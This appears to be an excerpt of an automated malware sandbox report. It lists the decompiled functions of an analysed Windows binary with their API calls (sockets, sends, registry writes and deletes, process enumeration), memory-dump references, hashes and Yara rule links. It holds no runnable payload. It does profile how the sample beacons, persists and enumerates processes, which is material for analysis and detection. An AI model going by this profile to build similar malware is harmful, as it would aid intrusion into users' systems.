                                                                                                                                                                                                              • Sleep.KERNEL32(000927C0,?,?,?,?,?,?,?,?,?,?,?,0040F4FC,?,00000000), ref: 00403A0C
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.3816864474.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000003.00000002.3816776889.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000003.00000002.3816926527.0000000000407000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000003.00000002.3816995713.0000000000408000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000003.00000002.3817068093.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000003.00000002.3817143820.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: TimeValue$FileSleepSystemclosesocketgethostbynamehtonslstrcpysocket
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1870287861-0
                                                                                                                                                                                                              • Opcode ID: d0b6cef66b800da90ba3467bf04fa9bfb8d2020867b52d5de8f0e7a8069a1da6
                                                                                                                                                                                                              • Instruction ID: 2ee653d2f7df55df6907a0a9b2e57412953aa95c4ecf6cadf6b3b4d2485eddb3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d0b6cef66b800da90ba3467bf04fa9bfb8d2020867b52d5de8f0e7a8069a1da6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E412D3B0A002149FDB20EF28CD45B997BB5AF45304F1482FAE808B73D1D7799A85CF59
                                                                                                                                                                                                              Function 004019AA Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 229processCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004019BF
                                                                                                                                                                                                              • Process32First.KERNEL32(00000000,?), ref: 00401A0A
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00401C12
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.3816864474.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000003.00000002.3816776889.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000003.00000002.3816926527.0000000000407000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000003.00000002.3816995713.0000000000408000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000003.00000002.3817068093.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000003.00000002.3817143820.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                                                                                                                                                                              • String ID: T2A
                                                                                                                                                                                                              • API String ID: 1083639309-2019523081
                                                                                                                                                                                                              • Opcode ID: 3b0f47bd1a5bf9f8010e0a9d41935c21d537d6427fc48c9c7731a0199396ee73
                                                                                                                                                                                                              • Instruction ID: 7c6136f779b091b801ec7ced044d4ecd4f532b5644714f746006db05a6c2f320
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3b0f47bd1a5bf9f8010e0a9d41935c21d537d6427fc48c9c7731a0199396ee73
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 627108706482009BE710AB24DD41B9B3BB8AB45348F04453AF945E72E1F37CE669CB9A
                                                                                                                                                                                                              Function 004038AA Relevance: 21.3, APIs: 14, Instructions: 306networksleepregistryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • lstrcpyA.KERNEL32(?,?,?,?,?,?,?,0040F4FC,?,00000000,?,?,?,0040F4FC,?,00000000), ref: 004029F2
                                                                                                                                                                                                              • gethostbyname.WS2_32(?), ref: 00402A11
                                                                                                                                                                                                              • htons.WS2_32(00000050), ref: 00402A30
                                                                                                                                                                                                              • socket.WS2_32(00000002,00000001,00000006), ref: 00402A5B
                                                                                                                                                                                                              • closesocket.WS2_32(00000000), ref: 00402A84
                                                                                                                                                                                                              • Sleep.KERNEL32(00000000), ref: 004038FD
                                                                                                                                                                                                              • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00403920
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,0040F4EE,00000000,00000003,00412170,00000012), ref: 004039CD
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,0040F4EE,00000000,00000003,00412170,00000012), ref: 004039EE
                                                                                                                                                                                                              • Sleep.KERNEL32(000927C0,?,?,?,?,?,?,?,?,?,?,?,0040F4FC,?,00000000), ref: 00403A0C
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.3816864474.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000003.00000002.3816776889.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000003.00000002.3816926527.0000000000407000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000003.00000002.3816995713.0000000000408000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000003.00000002.3817068093.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000003.00000002.3817143820.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: SleepTimeValue$FileSystemclosesocketgethostbynamehtonslstrcpysocket
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 104937078-0
                                                                                                                                                                                                              • Opcode ID: 59f52d4308e26f2c8992c92d3b2c4a8336bb46f4176d7e8b4135a0017782744e
                                                                                                                                                                                                              • Instruction ID: 51207a69c6f84e7cd26efe5e5962b9edc78a43a6ad57510283d07de6baf8f7fe
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 59f52d4308e26f2c8992c92d3b2c4a8336bb46f4176d7e8b4135a0017782744e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 94C12C71A002149BDB20DF38CD49BD977B5AF44304F1082B6E509F72D1E7B99A58CF5A
                                                                                                                                                                                                              Function 00402030 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 234networkstringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • lstrcpyA.KERNEL32(?,?), ref: 00402065
                                                                                                                                                                                                              • lstrlenA.KERNEL32(00000000,?), ref: 0040206E
                                                                                                                                                                                                              • htons.WS2_32(00000000), ref: 004020C9
                                                                                                                                                                                                              • inet_addr.WS2_32(?), ref: 004020F0
                                                                                                                                                                                                              • gethostbyname.WS2_32(?), ref: 00402107
                                                                                                                                                                                                              • socket.WS2_32(00000002,00000001,00000006), ref: 0040213E
                                                                                                                                                                                                              • closesocket.WS2_32(00000000), ref: 00402169
                                                                                                                                                                                                              • wsprintfA.USER32 ref: 004021B5
                                                                                                                                                                                                              • send.WS2_32(00000000,?,00000000,00000000), ref: 004021C5
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,0040748A), ref: 00402206
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.3816864474.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000003.00000002.3816776889.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000003.00000002.3816926527.0000000000407000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000003.00000002.3816995713.0000000000408000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000003.00000002.3817068093.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000003.00000002.3817143820.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: closesocketgethostbynamehtonsinet_addrlstrcmpilstrcpylstrlensendsocketwsprintf
                                                                                                                                                                                                              • String ID: 0
                                                                                                                                                                                                              • API String ID: 2963668025-4108050209
                                                                                                                                                                                                              • Opcode ID: c5914518efa31e6daf1d6d1c5ad6aede4384d13f612d860edefc583a5bee64dd
                                                                                                                                                                                                              • Instruction ID: 67f1582d9d65064009b7b38dedaf8d45dcb20af8a74f6ab8ff9eb660a5d02e62
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c5914518efa31e6daf1d6d1c5ad6aede4384d13f612d860edefc583a5bee64dd
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 83810DB0E002045BD710AB749E49B5F76B8AB05314F0441B6EB05FB2D1E7FC9A59C79E
                                                                                                                                                                                                              Function 004016E1 Relevance: 18.1, APIs: 12, Instructions: 144registrystringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegCreateKeyExA.ADVAPI32(80000001,00407160,00000000,00000000,00000000,000F003F,00000000,?,00000000,?,?,0040228C), ref: 00401720
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?,?,?,00001000,00000000,?,00000000,?,?,0040228C), ref: 00401751
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,00407120,?,?,?,?,?,?,?,00001000,00000000,?,00000000,?,?,0040228C), ref: 0040177F
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000003,00000000,00000000,00020019,?,00407120,?,?,?,?,?,?,?,00001000,00000000,?), ref: 00401795
                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,004071A8,00000000,?,?,?,?,?,?,00020019,?,00407120), ref: 004017D2
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(?,004071B4,00000000,00020019,?,?,?,?,?,?,?,?,?,00020019,?,00407120), ref: 00401817
                                                                                                                                                                                                              • RegEnumValueA.ADVAPI32(?,?,?,?,00000000,?,?,00001000), ref: 0040189E
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 004018BD
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00020019,?,00407120), ref: 004018CF
                                                                                                                                                                                                              • RegEnumKeyA.ADVAPI32(80000003,?,?,00001000), ref: 004018E8
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00001000,00000000,?,00000000,?,?,0040228C), ref: 004018FF
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.3816864474.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000003.00000002.3816776889.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000003.00000002.3816926527.0000000000407000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000003.00000002.3816995713.0000000000408000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000003.00000002.3817068093.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000003.00000002.3817143820.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Close$EnumOpenValue$CreateQuerylstrcatlstrlen
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1447802672-0
                                                                                                                                                                                                              • Opcode ID: c2f4eb5dcb65888f86c7ad64f5aeb95159d8d2dc340fff86f7741a61dcbf7091
                                                                                                                                                                                                              • Instruction ID: 66e194334fdec41dc41c183a83ee0e0423d2cbbda799cea80f6bf4481fa86f55
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c2f4eb5dcb65888f86c7ad64f5aeb95159d8d2dc340fff86f7741a61dcbf7091
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2941EEB2904344AAF73176219C0AF9B7B9C9B44348F14443FFE88B51D3E279962CC667
                                                                                                                                                                                                              Function 0040151E Relevance: 15.1, APIs: 10, Instructions: 92fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,004049C8,?,00000100,?,?,00000104), ref: 00401549
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000080,?,?,?,?,?,00000100,?,?,00000104), ref: 0040156D
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,?,?,?,?,00000100), ref: 00401588
                                                                                                                                                                                                              • ReadFile.KERNEL32(00000000,?,00001000,?,00000000,?,?,?,?,?,?,00000080,00000000), ref: 004015F1
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000080,00000000), ref: 00401601
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000080,00000000), ref: 00401607
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000080), ref: 0040160D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.3816864474.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000003.00000002.3816776889.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000003.00000002.3816926527.0000000000407000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000003.00000002.3816995713.0000000000408000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000003.00000002.3817068093.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000003.00000002.3817143820.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$CloseCreateHandle$AttributesDeleteRead
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3513576528-0
                                                                                                                                                                                                              • Opcode ID: 0d9829dfa8e08aa6c7748854afdc2d091dcfa343b8acebea5d3c5eb7fafc4fb7
                                                                                                                                                                                                              • Instruction ID: ead9107263b76718dec6335517b8b67c7343bef8d8983c19364d90e74fa0285a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0d9829dfa8e08aa6c7748854afdc2d091dcfa343b8acebea5d3c5eb7fafc4fb7
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8021A1B1A802007AE53031757C03F5B369C8B84758F190A3BFE06B91D6F5BDE62941AF
                                                                                                                                                                                                              Function 00401379 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 51processfilesynchronizationCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetStartupInfoA.KERNEL32(?), ref: 00401393
                                                                                                                                                                                                              • CreateProcessA.KERNEL32(?,--k33p,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 004013AF
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,?,--k33p,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 004013C9
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,00000000,?,?), ref: 004013D9
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?), ref: 004013ED
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,?,?), ref: 004013FC
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,00000000,?,?), ref: 00401405
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.3816864474.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000003.00000002.3816776889.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000003.00000002.3816926527.0000000000407000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000003.00000002.3816995713.0000000000408000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000003.00000002.3817068093.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000003.00000002.3817143820.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseHandle$Create$FileInfoObjectProcessSingleStartupWait
                                                                                                                                                                                                              • String ID: --k33p
                                                                                                                                                                                                              • API String ID: 881816827-1573217081
                                                                                                                                                                                                              • Opcode ID: 23540df0282b53dc4e0cdbe067ed9abf83ee08cd0daae6381b3e11d49cf6d48d
                                                                                                                                                                                                              • Instruction ID: 3f95ffb7ecc753adf67741720bf5132c3bbf7ea7650a4e902ed5c82167082f99
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 23540df0282b53dc4e0cdbe067ed9abf83ee08cd0daae6381b3e11d49cf6d48d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8C01813180420476D6213A36AC07F0F7FA89B4576CF210A3DF959351EAE67D663D42AF
                                                                                                                                                                                                              Function 00401D76 Relevance: 12.1, APIs: 8, Instructions: 94networkCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 00401D9F
                                                                                                                                                                                                              • connect.WS2_32(00000000,?,00000010), ref: 00401DB3
                                                                                                                                                                                                              • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 00401DC9
                                                                                                                                                                                                              • WSAGetLastError.WS2_32 ref: 00401DDB
                                                                                                                                                                                                              • ioctlsocket.WS2_32(00000000,8004667E,?), ref: 00401DF8
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.3816864474.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000003.00000002.3816776889.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000003.00000002.3816926527.0000000000407000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000003.00000002.3816995713.0000000000408000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000003.00000002.3817068093.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000003.00000002.3817143820.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ioctlsocket$ErrorLastconnect
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1886816560-0
                                                                                                                                                                                                              • Opcode ID: 9e80b3ac6c6475ff1c6574f67f9f1b28db439d7aba4eb792491afc0fea029df5
                                                                                                                                                                                                              • Instruction ID: 443f35bcad443bf4521d197b8b602cf4c8bc99f5fac3635e2f32846607df0921
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9e80b3ac6c6475ff1c6574f67f9f1b28db439d7aba4eb792491afc0fea029df5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E53191B15042005AE230AA65DD45FDF76EC9B8531CF00073EF999A62D1E678A62982EB
                                                                                                                                                                                                              Function 004024CE Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 123stringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.3816864474.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000003.00000002.3816776889.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000003.00000002.3816926527.0000000000407000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000003.00000002.3816995713.0000000000408000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000003.00000002.3817068093.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000003.00000002.3817143820.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: wsprintf$lstrcpylstrlen
                                                                                                                                                                                                              • String ID: %02X$p!A
                                                                                                                                                                                                              • API String ID: 1876335253-3420651641
                                                                                                                                                                                                              • Opcode ID: cb09279badd15ee99111056726957111c3d85b17a551844977e1177323dfd80f
                                                                                                                                                                                                              • Instruction ID: 2cea46374afef77fdc915a1e9f7db235c3865f046913e12eac0c1d1ce8585de9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cb09279badd15ee99111056726957111c3d85b17a551844977e1177323dfd80f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4F410331C002189BDB11EF68CD8979EBBF5BF40308F150176E815BB2D2D3B9A919C799
                                                                                                                                                                                                              Function 00401912 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 55registryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?,?,?,00405EB0), ref: 0040193D
                                                                                                                                                                                                              • wsprintfA.USER32 ref: 00401953
                                                                                                                                                                                                              • RegEnumKeyA.ADVAPI32(?,00000000,?,00000300), ref: 0040197D
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,00000300,?,?,?,?,?,00020019,?,?,?,00405EB0), ref: 0040198D
                                                                                                                                                                                                              • RegDeleteKeyA.ADVAPI32(?), ref: 0040199A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.3816864474.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000003.00000002.3816776889.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000003.00000002.3816926527.0000000000407000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000003.00000002.3816995713.0000000000408000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000003.00000002.3817068093.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000003.00000002.3817143820.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseDeleteEnumOpenwsprintf
                                                                                                                                                                                                              • String ID: %s\%s
                                                                                                                                                                                                              • API String ID: 4202809218-4073750446
                                                                                                                                                                                                              • Opcode ID: bc1c0bbb8f76672b1839e5cdb49d41e6cb4f6e9dc379d8bdb7dadbb7b60f7000
                                                                                                                                                                                                              • Instruction ID: 17f0bcb135b28bc178a216f8b2dfa9435dc5451e8c8b02a629b5be3cc13ba035
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bc1c0bbb8f76672b1839e5cdb49d41e6cb4f6e9dc379d8bdb7dadbb7b60f7000
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C601ACB2A042047BE52075266D03F9B76ECCBC574CF11007AF909B61D1E5799F2981BF
                                                                                                                                                                                                              Function 00401439 Relevance: 9.1, APIs: 6, Instructions: 70registryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000002,004074E0,00000000,0002001F,?,?,?,?,?,?,?,?,?,004053DB), ref: 00401455
                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,0040751C,00000000,?,?,?,?,?,?,0002001F,?), ref: 00401482
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,0002001F,?), ref: 0040149E
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,004074E0,00000000,0002001F,?,?,?,?,?,0002001F,?), ref: 004014BF
                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,0040751C,00000000,?,?,?,?,?,?,0002001F,?,?,?,?,?,0002001F), ref: 004014F3
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.3816864474.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000003.00000002.3816776889.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000003.00000002.3816926527.0000000000407000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000003.00000002.3816995713.0000000000408000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000003.00000002.3817068093.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000003.00000002.3817143820.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: OpenQueryValue$Close
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2529929805-0
                                                                                                                                                                                                              • Opcode ID: 4a95097c5cd9ac49c2c0031509204a62f35eae4208d5cebb0b882de0ceae9e8d
                                                                                                                                                                                                              • Instruction ID: 4b3f21838edb9e41f667f6993cf98c5a1242fec43926aa3cdaef8ebd8d2009fd
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4a95097c5cd9ac49c2c0031509204a62f35eae4208d5cebb0b882de0ceae9e8d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8C1187B2904300B7E700AA61AD46F2777ACBB8470DF11083EFD45B51D2F279DA288767
                                                                                                                                                                                                              Function 00401EC9 Relevance: 7.6, APIs: 5, Instructions: 113networkCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • select.WS2_32(00000000,?,00000000,00000000,?), ref: 00401F45
                                                                                                                                                                                                              • recv.WS2_32(00000000,?,?,00000002), ref: 00401F5E
                                                                                                                                                                                                              • recv.WS2_32(00000000,?,00000001,00000000), ref: 00401F7E
                                                                                                                                                                                                              • recv.WS2_32(00000000,?,-00000001,00000000), ref: 00401FB4
                                                                                                                                                                                                              • recv.WS2_32(00000000,?,00000000,00000000), ref: 00401FC6
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.3816864474.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000003.00000002.3816776889.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000003.00000002.3816926527.0000000000407000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000003.00000002.3816995713.0000000000408000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000003.00000002.3817068093.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000003.00000002.3817143820.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: recv$select
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 873784944-0
                                                                                                                                                                                                              • Opcode ID: 331c4b56a962cc5ab22ade2b3a75bc455250cfa2f4922ab3eade63a1b2494d84
                                                                                                                                                                                                              • Instruction ID: c66e6617afff8c9d9109827ab4c11b99613a78ce40c43f432ca9f356368ad492
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 331c4b56a962cc5ab22ade2b3a75bc455250cfa2f4922ab3eade63a1b2494d84
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0A31097040C3429BD731DE14C984B6BBAD8EB81358F24453FF589A62D1E3BD8445D7A7
                                                                                                                                                                                                              Function 0040263A Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • select.WS2_32(00000000,?,00000000,00000000,?), ref: 004026B1
